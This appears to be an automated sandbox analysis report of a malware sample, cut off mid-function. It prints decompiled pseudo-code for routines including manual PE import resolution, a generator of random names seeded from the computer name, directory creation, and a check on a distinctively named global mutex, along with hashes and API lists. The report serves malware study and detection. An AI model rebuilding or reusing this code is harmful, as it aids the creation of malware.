                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                                                            • String ID:
                                                            • API String ID: 3626615345-0
                                                            • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                            • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                                                            • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                            • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E00407831(CHAR* __ebx) {
                                                            				void* _t19;
                                                            				void _t21;
                                                            				intOrPtr _t28;
                                                            				signed int _t30;
                                                            				int _t32;
                                                            				intOrPtr* _t33;
                                                            				intOrPtr _t34;
                                                            				CHAR* _t35;
                                                            				intOrPtr _t38;
                                                            				intOrPtr* _t41;
                                                            				void* _t42;
                                                            
                                                            				_t35 = __ebx;
                                                            				__setusermatherr(E0040793C);
                                                            				E0040792A(_t19);
                                                            				_push(0x40e00c);
                                                            				_push(0x40e008);
                                                            				L00407924();
                                                            				_t21 =  *0x40f940; // 0x0
                                                            				 *(_t42 - 0x6c) = _t21;
                                                            				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
                                                            				_push(0x40e004);
                                                            				_push(0x40e000);
                                                            				L00407924();
                                                            				_t41 =  *_acmdln;
                                                            				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                            				if( *_t41 != 0x22) {
                                                            					while(1) {
                                                            						__eflags =  *_t41 - 0x20;
                                                            						if(__eflags <= 0) {
                                                            							goto L6;
                                                            						}
                                                            						_t41 = _t41 + 1;
                                                            						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t41 = _t41 + 1;
                                                            						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                            						_t34 =  *_t41;
                                                            					} while (_t34 != _t35 && _t34 != 0x22);
                                                            					if( *_t41 == 0x22) {
                                                            						L5:
                                                            						_t41 = _t41 + 1;
                                                            						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                            					}
                                                            				}
                                                            				L6:
                                                            				_t28 =  *_t41;
                                                            				if(_t28 != _t35 && _t28 <= 0x20) {
                                                            					goto L5;
                                                            				}
                                                            				 *(_t42 - 0x30) = _t35;
                                                            				GetStartupInfoA(_t42 - 0x5c);
                                                            				_t52 =  *(_t42 - 0x30) & 0x00000001;
                                                            				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
                                                            					_t30 = 0xa;
                                                            				} else {
                                                            					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
                                                            				}
                                                            				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
                                                            				 *(_t42 - 0x68) = _t32;
                                                            				exit(_t32);
                                                            				_t33 =  *((intOrPtr*)(_t42 - 0x14));
                                                            				_t38 =  *((intOrPtr*)( *_t33));
                                                            				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
                                                            				_push(_t33);
                                                            				_push(_t38);
                                                            				L0040791E();
                                                            				return _t33;
                                                            			}














                                                            0x00407831
                                                            0x00407836
                                                            0x0040783d
                                                            0x00407842
                                                            0x00407847
                                                            0x0040784c
                                                            0x00407851
                                                            0x00407856
                                                            0x0040786f
                                                            0x00407875
                                                            0x0040787a
                                                            0x0040787f
                                                            0x0040788c
                                                            0x0040788e
                                                            0x00407894
                                                            0x004078d0
                                                            0x004078d0
                                                            0x004078d3
                                                            0x00000000
                                                            0x00000000
                                                            0x004078d5
                                                            0x004078d6
                                                            0x004078d6
                                                            0x00407896
                                                            0x00407896
                                                            0x00407896
                                                            0x00407897
                                                            0x0040789a
                                                            0x0040789c
                                                            0x004078a7
                                                            0x004078a9
                                                            0x004078a9
                                                            0x004078aa
                                                            0x004078aa
                                                            0x004078a7
                                                            0x004078ad
                                                            0x004078ad
                                                            0x004078b1
                                                            0x00000000
                                                            0x00000000
                                                            0x004078b7
                                                            0x004078be
                                                            0x004078c4
                                                            0x004078c8
                                                            0x004078dd
                                                            0x004078ca
                                                            0x004078ca
                                                            0x004078ca
                                                            0x004078e9
                                                            0x004078ee
                                                            0x004078f2
                                                            0x004078f8
                                                            0x004078fd
                                                            0x004078ff
                                                            0x00407902
                                                            0x00407903
                                                            0x00407904
                                                            0x0040790b

                                                            APIs
                                                            • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                                                              • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                                                            • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                            • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                            • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                            • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                                                            • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                                                            • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                                                            • String ID:
                                                            • API String ID: 2141228402-0
                                                            • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                            • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                                                            • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                            • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E004027DF(signed int* _a4) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr* _t50;
                                                            				intOrPtr _t53;
                                                            				intOrPtr _t55;
                                                            				void* _t58;
                                                            				void _t60;
                                                            				signed int _t63;
                                                            				signed int _t67;
                                                            				intOrPtr _t68;
                                                            				void* _t73;
                                                            				signed int _t75;
                                                            				intOrPtr _t87;
                                                            				intOrPtr* _t88;
                                                            				intOrPtr* _t90;
                                                            				void* _t91;
                                                            
                                                            				_t90 = _a4;
                                                            				_t2 = _t90 + 4; // 0x4be8563c
                                                            				_t87 =  *_t2;
                                                            				_t50 =  *_t90 + 0x80;
                                                            				_t75 = 1;
                                                            				_v16 = _t87;
                                                            				_v12 = _t75;
                                                            				if( *((intOrPtr*)(_t50 + 4)) != 0) {
                                                            					_t73 =  *_t50 + _t87;
                                                            					if(IsBadReadPtr(_t73, 0x14) != 0) {
                                                            						L25:
                                                            						return _v12;
                                                            					}
                                                            					while(1) {
                                                            						_t53 =  *((intOrPtr*)(_t73 + 0xc));
                                                            						if(_t53 == 0) {
                                                            							goto L25;
                                                            						}
                                                            						_t8 = _t90 + 0x30; // 0xc085d0ff
                                                            						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
                                                            						_v8 = _t55;
                                                            						if(_t55 == 0) {
                                                            							SetLastError(0x7e);
                                                            							L23:
                                                            							_v12 = _v12 & 0x00000000;
                                                            							goto L25;
                                                            						}
                                                            						_t11 = _t90 + 0xc; // 0x317459c0
                                                            						_t14 = _t90 + 8; // 0x85000001
                                                            						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
                                                            						if(_t58 == 0) {
                                                            							_t40 = _t90 + 0x30; // 0xc085d0ff
                                                            							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
                                                            							SetLastError(0xe);
                                                            							goto L23;
                                                            						}
                                                            						_t15 = _t90 + 0xc; // 0x317459c0
                                                            						 *(_t90 + 8) = _t58;
                                                            						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
                                                            						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
                                                            						_t60 =  *_t73;
                                                            						if(_t60 == 0) {
                                                            							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
                                                            							_a4 = _t88;
                                                            						} else {
                                                            							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
                                                            							_a4 = _t60 + _t87;
                                                            						}
                                                            						while(1) {
                                                            							_t63 =  *_a4;
                                                            							if(_t63 == 0) {
                                                            								break;
                                                            							}
                                                            							if((_t63 & 0x80000000) == 0) {
                                                            								_t32 = _t90 + 0x30; // 0xc085d0ff
                                                            								_push( *_t32);
                                                            								_t67 = _t63 + _v16 + 2;
                                                            							} else {
                                                            								_t30 = _t90 + 0x30; // 0xc085d0ff
                                                            								_push( *_t30);
                                                            								_t67 = _t63 & 0x0000ffff;
                                                            							}
                                                            							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
                                                            							_t91 = _t91 + 0xc;
                                                            							 *_t88 = _t68;
                                                            							if(_t68 == 0) {
                                                            								_v12 = _v12 & 0x00000000;
                                                            								break;
                                                            							} else {
                                                            								_a4 =  &(_a4[1]);
                                                            								_t88 = _t88 + 4;
                                                            								continue;
                                                            							}
                                                            						}
                                                            						if(_v12 == 0) {
                                                            							_t45 = _t90 + 0x30; // 0xc085d0ff
                                                            							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
                                                            							SetLastError(0x7f);
                                                            							goto L25;
                                                            						}
                                                            						_t73 = _t73 + 0x14;
                                                            						if(IsBadReadPtr(_t73, 0x14) == 0) {
                                                            							_t87 = _v16;
                                                            							continue;
                                                            						}
                                                            						goto L25;
                                                            					}
                                                            					goto L25;
                                                            				}
                                                            				return _t75;
                                                            			}




















                                                            0x004027e6
                                                            0x004027ee
                                                            0x004027ee
                                                            0x004027f1
                                                            0x004027f6
                                                            0x004027f7
                                                            0x004027fa
                                                            0x00402801
                                                            0x0040280d
                                                            0x0040281a
                                                            0x0040291c
                                                            0x00000000
                                                            0x0040291f
                                                            0x00402825
                                                            0x00402825
                                                            0x0040282a
                                                            0x00000000
                                                            0x00000000
                                                            0x00402830
                                                            0x00402836
                                                            0x0040283a
                                                            0x00402840
                                                            0x004028fd
                                                            0x004028fd
                                                            0x00402903
                                                            0x00000000
                                                            0x00402903
                                                            0x00402846
                                                            0x00402851
                                                            0x00402854
                                                            0x0040285e
                                                            0x004028f0
                                                            0x004028f6
                                                            0x004028fd
                                                            0x00000000
                                                            0x004028fd
                                                            0x00402864
                                                            0x0040286a
                                                            0x0040286d
                                                            0x00402870
                                                            0x00402873
                                                            0x00402877
                                                            0x00402889
                                                            0x0040288b
                                                            0x00402879
                                                            0x0040287e
                                                            0x00402881
                                                            0x00402881
                                                            0x0040288e
                                                            0x00402891
                                                            0x00402895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040289c
                                                            0x004028ab
                                                            0x004028ab
                                                            0x004028b0
                                                            0x0040289e
                                                            0x0040289e
                                                            0x0040289e
                                                            0x004028a1
                                                            0x004028a1
                                                            0x004028b7
                                                            0x004028ba
                                                            0x004028bd
                                                            0x004028c1
                                                            0x004028cc
                                                            0x00000000
                                                            0x004028c3
                                                            0x004028c3
                                                            0x004028c7
                                                            0x00000000
                                                            0x004028c7
                                                            0x004028c1
                                                            0x004028d4
                                                            0x00402909
                                                            0x0040290f
                                                            0x00402916
                                                            0x00000000
                                                            0x00402916
                                                            0x004028d6
                                                            0x004028e4
                                                            0x00402822
                                                            0x00000000
                                                            0x00402822
                                                            0x00000000
                                                            0x004028ea
                                                            0x00000000
                                                            0x00402825
                                                            0x00000000

                                                            APIs
                                                            • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                                                            • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                                                            • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Read$realloc
                                                            • String ID: ?!@
                                                            • API String ID: 1241503663-708128716
                                                            • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                            • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                                                            • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                            • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00401225(intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				void _v410;
                                                            				long _v412;
                                                            				long _t34;
                                                            				signed int _t42;
                                                            				intOrPtr _t44;
                                                            				signed int _t45;
                                                            				signed int _t48;
                                                            				int _t54;
                                                            				signed int _t56;
                                                            				signed int _t60;
                                                            				signed int _t61;
                                                            				signed int _t62;
                                                            				void* _t71;
                                                            				signed short* _t72;
                                                            				void* _t76;
                                                            				void* _t77;
                                                            
                                                            				_t34 =  *0x40f874; // 0x0
                                                            				_v412 = _t34;
                                                            				_t56 = 0x63;
                                                            				_v12 = 0x18f;
                                                            				memset( &_v410, 0, _t56 << 2);
                                                            				asm("stosw");
                                                            				GetComputerNameW( &_v412,  &_v12);
                                                            				_v8 = _v8 & 0x00000000;
                                                            				_t54 = 1;
                                                            				if(wcslen( &_v412) > 0) {
                                                            					_t72 =  &_v412;
                                                            					do {
                                                            						_t54 = _t54 * ( *_t72 & 0x0000ffff);
                                                            						_v8 = _v8 + 1;
                                                            						_t72 =  &(_t72[1]);
                                                            					} while (_v8 < wcslen( &_v412));
                                                            				}
                                                            				srand(_t54);
                                                            				_t42 = rand();
                                                            				_t71 = 0;
                                                            				asm("cdq");
                                                            				_t60 = 8;
                                                            				_t76 = _t42 % _t60 + _t60;
                                                            				if(_t76 > 0) {
                                                            					do {
                                                            						_t48 = rand();
                                                            						asm("cdq");
                                                            						_t62 = 0x1a;
                                                            						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
                                                            						_t71 = _t71 + 1;
                                                            					} while (_t71 < _t76);
                                                            				}
                                                            				_t77 = _t76 + 3;
                                                            				while(_t71 < _t77) {
                                                            					_t45 = rand();
                                                            					asm("cdq");
                                                            					_t61 = 0xa;
                                                            					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
                                                            					_t71 = _t71 + 1;
                                                            				}
                                                            				_t44 = _a4;
                                                            				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
                                                            				return _t44;
                                                            			}





















                                                            0x0040122e
                                                            0x00401239
                                                            0x00401240
                                                            0x00401249
                                                            0x00401250
                                                            0x00401252
                                                            0x0040125f
                                                            0x0040126b
                                                            0x00401277
                                                            0x0040127e
                                                            0x00401280
                                                            0x00401286
                                                            0x00401289
                                                            0x0040128c
                                                            0x00401297
                                                            0x0040129d
                                                            0x00401286
                                                            0x004012a1
                                                            0x004012ae
                                                            0x004012b2
                                                            0x004012b4
                                                            0x004012b5
                                                            0x004012ba
                                                            0x004012be
                                                            0x004012c0
                                                            0x004012c0
                                                            0x004012c4
                                                            0x004012c5
                                                            0x004012ce
                                                            0x004012d1
                                                            0x004012d2
                                                            0x004012c0
                                                            0x004012d6
                                                            0x004012d9
                                                            0x004012dd
                                                            0x004012e1
                                                            0x004012e2
                                                            0x004012eb
                                                            0x004012ee
                                                            0x004012ee
                                                            0x004012f1
                                                            0x004012f4
                                                            0x004012fc

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: rand$wcslen$ComputerNamesrand
                                                            • String ID:
                                                            • API String ID: 3058258771-0
                                                            • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                            • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                                                            • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                            • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00407070(char* _a4, char* _a8) {
                                                            				char _v264;
                                                            				void _v524;
                                                            				long _t16;
                                                            				char* _t30;
                                                            				char* _t31;
                                                            				char* _t36;
                                                            				char* _t38;
                                                            				int _t40;
                                                            				void* _t41;
                                                            
                                                            				_t30 = _a4;
                                                            				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
                                                            					CreateDirectoryA(_t30, 0);
                                                            				}
                                                            				_t36 = _a8;
                                                            				_t16 =  *_t36;
                                                            				if(_t16 != 0) {
                                                            					_t38 = _t36;
                                                            					_t31 = _t36;
                                                            					do {
                                                            						if(_t16 == 0x2f || _t16 == 0x5c) {
                                                            							_t38 = _t31;
                                                            						}
                                                            						_t16 = _t31[1];
                                                            						_t31 =  &(_t31[1]);
                                                            					} while (_t16 != 0);
                                                            					if(_t38 != _t36) {
                                                            						_t40 = _t38 - _t36;
                                                            						memcpy( &_v524, _t36, _t40);
                                                            						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
                                                            						E00407070(_t30,  &_v524);
                                                            					}
                                                            					_v264 = _v264 & 0x00000000;
                                                            					if(_t30 != 0) {
                                                            						strcpy( &_v264, _t30);
                                                            					}
                                                            					strcat( &_v264, _t36);
                                                            					_t16 = GetFileAttributesA( &_v264);
                                                            					if(_t16 == 0xffffffff) {
                                                            						return CreateDirectoryA( &_v264, 0);
                                                            					}
                                                            				}
                                                            				return _t16;
                                                            			}












                                                            0x0040707a
                                                            0x00407080
                                                            0x00407091
                                                            0x00407091
                                                            0x00407097
                                                            0x0040709a
                                                            0x0040709e
                                                            0x004070a5
                                                            0x004070a7
                                                            0x004070a9
                                                            0x004070ab
                                                            0x004070b1
                                                            0x004070b1
                                                            0x004070b3
                                                            0x004070b6
                                                            0x004070b7
                                                            0x004070bd
                                                            0x004070bf
                                                            0x004070ca
                                                            0x004070cf
                                                            0x004070df
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070f1
                                                            0x004070fb
                                                            0x00407101
                                                            0x0040710a
                                                            0x00407118
                                                            0x00407121
                                                            0x00000000
                                                            0x0040712c
                                                            0x00407121
                                                            0x00407135

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                                                            • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                                                            • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                                                            • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                                                            • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                                                            • String ID:
                                                            • API String ID: 2935503933-0
                                                            • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                            • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                                                            • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                            • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401EFF(intOrPtr _a4) {
                                                            				char _v104;
                                                            				void* _t9;
                                                            				void* _t11;
                                                            				void* _t12;
                                                            
                                                            				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
                                                            				_t12 = 0;
                                                            				if(_a4 <= 0) {
                                                            					L3:
                                                            					return 0;
                                                            				} else {
                                                            					goto L1;
                                                            				}
                                                            				while(1) {
                                                            					L1:
                                                            					_t9 = OpenMutexA(0x100000, 1,  &_v104);
                                                            					if(_t9 != 0) {
                                                            						break;
                                                            					}
                                                            					Sleep(0x3e8);
                                                            					_t12 = _t12 + 1;
                                                            					if(_t12 < _a4) {
                                                            						continue;
                                                            					}
                                                            					goto L3;
                                                            				}
                                                            				CloseHandle(_t9);
                                                            				_t11 = 1;
                                                            				return _t11;
                                                            			}







                                                            0x00401f16
                                                            0x00401f1c
                                                            0x00401f24
                                                            0x00401f4c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f26
                                                            0x00401f26
                                                            0x00401f31
                                                            0x00401f39
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f40
                                                            0x00401f46
                                                            0x00401f4a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f4a
                                                            0x00401f52
                                                            0x00401f5a
                                                            0x00000000

                                                            APIs
                                                            • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                                                            • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                                                            • Sleep.KERNEL32(000003E8), ref: 00401F40
                                                            • CloseHandle.KERNEL32(00000000), ref: 00401F52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleMutexOpenSleepsprintf
                                                            • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                                                            • API String ID: 2780352083-2959021817
                                                            • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                            • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                                                            • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                            • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                            				void* _v12;
                                                            				char _v16;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v48;
                                                            				signed int _t121;
                                                            				int _t124;
                                                            				intOrPtr* _t126;
                                                            				intOrPtr _t127;
                                                            				int _t131;
                                                            				intOrPtr* _t133;
                                                            				intOrPtr _t135;
                                                            				intOrPtr _t137;
                                                            				signed int _t139;
                                                            				signed int _t140;
                                                            				signed int _t143;
                                                            				signed int _t150;
                                                            				intOrPtr _t160;
                                                            				int _t161;
                                                            				int _t163;
                                                            				signed int _t164;
                                                            				signed int _t165;
                                                            				intOrPtr _t168;
                                                            				void* _t169;
                                                            				signed int _t170;
                                                            				signed int _t172;
                                                            				signed int _t175;
                                                            				signed int _t178;
                                                            				intOrPtr _t194;
                                                            				void* _t195;
                                                            				void* _t196;
                                                            				void* _t197;
                                                            				intOrPtr _t198;
                                                            				void* _t201;
                                                            
                                                            				_t197 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                            					_push(0x40d570);
                                                            					_push( &_v16);
                                                            					L0040776E();
                                                            				}
                                                            				_t121 = _a12;
                                                            				if(_t121 == 0) {
                                                            					L15:
                                                            					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
                                                            					_push(0x40d570);
                                                            					_push( &_v16);
                                                            					L0040776E();
                                                            					_push( &_v16);
                                                            					_push(0);
                                                            					_push(_t197);
                                                            					_t198 = _v36;
                                                            					_t194 = _v32;
                                                            					_t168 =  *((intOrPtr*)(_t198 + 0x30));
                                                            					_t160 =  *((intOrPtr*)(_t198 + 0x34));
                                                            					_t71 = _t194 + 0xc; // 0x40d568
                                                            					_v48 =  *_t71;
                                                            					_v32 = _t168;
                                                            					if(_t168 > _t160) {
                                                            						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
                                                            					}
                                                            					_t75 = _t194 + 0x10; // 0x19930520
                                                            					_t124 =  *_t75;
                                                            					_t161 = _t160 - _t168;
                                                            					if(_t161 > _t124) {
                                                            						_t161 = _t124;
                                                            					}
                                                            					if(_t161 != 0 && _a8 == 0xfffffffb) {
                                                            						_a8 = _a8 & 0x00000000;
                                                            					}
                                                            					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
                                                            					 *(_t194 + 0x10) = _t124 - _t161;
                                                            					_t126 =  *((intOrPtr*)(_t198 + 0x38));
                                                            					if(_t126 != 0) {
                                                            						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
                                                            						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
                                                            						_t201 = _t201 + 0xc;
                                                            						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
                                                            					}
                                                            					if(_t161 != 0) {
                                                            						memcpy(_v12, _a4, _t161);
                                                            						_v12 = _v12 + _t161;
                                                            						_t201 = _t201 + 0xc;
                                                            						_a4 = _a4 + _t161;
                                                            					}
                                                            					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
                                                            					if(_a4 == _t127) {
                                                            						_t169 =  *((intOrPtr*)(_t198 + 0x28));
                                                            						_a4 = _t169;
                                                            						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
                                                            							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
                                                            						}
                                                            						_t99 = _t194 + 0x10; // 0x19930520
                                                            						_t131 =  *_t99;
                                                            						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
                                                            						if(_t163 > _t131) {
                                                            							_t163 = _t131;
                                                            						}
                                                            						if(_t163 != 0 && _a8 == 0xfffffffb) {
                                                            							_a8 = _a8 & 0x00000000;
                                                            						}
                                                            						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
